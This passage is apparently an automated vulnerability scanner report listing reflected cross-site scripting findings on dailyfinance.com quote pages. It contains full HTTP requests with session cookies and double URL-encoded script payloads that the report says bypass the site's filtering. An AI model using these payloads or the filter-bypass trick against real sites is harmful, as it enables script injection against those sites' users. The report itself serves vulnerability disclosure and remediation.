Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/neophotoniocs-corporation/nptn6fbf2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f3cf8f4bfb/nys HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8185c'%3b67ee1fb4501 was submitted in the REST URL parameter 3. This input was echoed as 8185c';67ee1fb4501 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/neophotoniocs-corporation/nptn8185c'%3b67ee1fb4501/nys HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 169b3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4549f5c5ea1 was submitted in the REST URL parameter 3. This input was echoed as 169b3"><script>alert(1)</script>4549f5c5ea1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/nikkei-225/n225169b3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4549f5c5ea1/fx1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98575'%3b6a7a2a27058 was submitted in the REST URL parameter 3. This input was echoed as 98575';6a7a2a27058 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/nikkei-225/n22598575'%3b6a7a2a27058/fx1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d847%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee3d50cf7382 was submitted in the REST URL parameter 3. This input was echoed as 3d847"><script>alert(1)</script>e3d50cf7382 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/platinum-futures-apr-2011-composite/3d847%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee3d50cf7382/nym HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15bff'%3be5c6e90dd88 was submitted in the REST URL parameter 3. This input was echoed as 15bff';e5c6e90dd88 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/platinum-futures-apr-2011-composite/15bff'%3be5c6e90dd88/nym HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6943a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec2c491ec6c6 was submitted in the REST URL parameter 3. This input was echoed as 6943a"><script>alert(1)</script>c2c491ec6c6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/sandp-500-index-rth/$inx6943a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec2c491ec6c6/cmi HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ef6f'%3b35cf4eb1a12 was submitted in the REST URL parameter 3. This input was echoed as 1ef6f';35cf4eb1a12 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/sandp-500-index-rth/$inx1ef6f'%3b35cf4eb1a12/cmi HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1db1a'%3b3125b1eb027 was submitted in the REST URL parameter 3. This input was echoed as 1db1a';3125b1eb027 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/spdr-sandp-500-etf-tr/spy1db1a'%3b3125b1eb027/nys HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4112d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e078d6794cf7 was submitted in the REST URL parameter 3. This input was echoed as 4112d"><script>alert(1)</script>078d6794cf7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/spdr-sandp-500-etf-tr/spy4112d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e078d6794cf7/nys HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d530'%3b6f3b3da09e was submitted in the REST URL parameter 3. This input was echoed as 3d530';6f3b3da09e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/sprint-nextel-corporation/s3d530'%3b6f3b3da09e/nys HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68fb1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7362bd8fb93 was submitted in the REST URL parameter 3. This input was echoed as 68fb1"><script>alert(1)</script>7362bd8fb93 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/sprint-nextel-corporation/s68fb1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7362bd8fb93/nys HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26e1e'%3b030ba315ab8 was submitted in the REST URL parameter 3. This input was echoed as 26e1e';030ba315ab8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/ten-year-u-s-treasury-note/(tc10y26e1e'%3b030ba315ab8/bss HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bc32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e163bd5df29e was submitted in the REST URL parameter 3. This input was echoed as 4bc32"><script>alert(1)</script>163bd5df29e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/ten-year-u-s-treasury-note/(tc10y4bc32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e163bd5df29e/bss HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ffb8c'%3b35d689f372e was submitted in the REST URL parameter 3. This input was echoed as ffb8c';35d689f372e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/uk-sterling-b-vs-united-states-dollar-spot-gbp-usd/gbpusdffb8c'%3b35d689f372e/fx1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cb01%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eba2fbb7d72e was submitted in the REST URL parameter 3. This input was echoed as 3cb01"><script>alert(1)</script>ba2fbb7d72e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/uk-sterling-b-vs-united-states-dollar-spot-gbp-usd/gbpusd3cb01%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eba2fbb7d72e/fx1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7fec%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5404f246cc9 was submitted in the REST URL parameter 3. This input was echoed as e7fec"><script>alert(1)</script>5404f246cc9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/united-states-dollar-b-vs-japanese-yen-spot-usd-jpy/usdjpye7fec%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5404f246cc9/fx1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 981fb'%3bc52383b8215 was submitted in the REST URL parameter 3. This input was echoed as 981fb';c52383b8215 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/united-states-dollar-b-vs-japanese-yen-spot-usd-jpy/usdjpy981fb'%3bc52383b8215/fx1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c349'%3b9fff4749479 was submitted in the REST URL parameter 3. This input was echoed as 9c349';9fff4749479 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/united-states-dollar-b-vs-swiss-franc-spot-usd-chf/usdchf9c349'%3b9fff4749479/fx1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 616da%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e813bd4458e2 was submitted in the REST URL parameter 3. This input was echoed as 616da"><script>alert(1)</script>813bd4458e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/united-states-dollar-b-vs-swiss-franc-spot-usd-chf/usdchf616da%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e813bd4458e2/fx1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
